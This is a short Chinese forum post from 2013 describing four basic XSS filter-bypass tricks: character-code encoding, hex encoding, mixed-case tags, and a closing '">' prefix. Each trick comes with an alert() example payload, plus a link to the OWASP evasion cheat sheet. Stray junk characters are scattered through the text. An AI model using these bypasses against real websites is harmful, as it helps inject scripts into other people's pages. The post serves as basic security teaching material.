四种超级基础的绕过方法。
, p9 A8 A: X( Y7 x7 O" C. m1.转换为ASCII码
) D* f0 O6 h6 s( f. r( ]! x例子:原脚本为<script>alert(‘I love F4ck’)</script >* t2 o+ j; ]& H
通过转换,变成:
( M# h) r' j( {- V- ~+ g; o<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
& s& ?: j4 {, m* N3 T1 G
/ y F* S/ r7 @- t2.转换为HEX(十六进制)
' V" J, o4 T0 ]+ M) B0 U/ s) Q- ^例子:原脚本为<script>alert(‘I love F4ck’)</script>9 s) h) a: f) J1 }
通过转换,变成:- W$ A+ v8 b# s! c- q
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e: @# I0 H5 |& W/ D0 v L
G, j4 n1 T- g& j
3.转换脚本的大小写) A- H0 m4 f/ _- b# u: s; E
例子:原脚本为<script>alert(‘I love F4ck’)</script>' b8 x# ~" v" m5 Y2 ~. p' E& D2 I
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
$ Y! B+ U$ z% G2 l5 E
$ f! Z! H3 r6 [9 l! n4.增加闭合标记”>
" V3 `. d2 a' E7 N例子:原脚本为<script>alert(‘I love F4ck’)</script># b8 y3 k6 q( K& ], K
转换为:”><script>alert(‘I love F4ck’)</script>" Q j* B. X! o% E6 M3 F) E: f/ \
更详细绕过技术请参考此网页, i8 D+ ]/ F1 c1 w- ^, b3 n
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
; n: `# X& N6 S/ H. O ! j$ W1 V% Y* n+ @! n
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对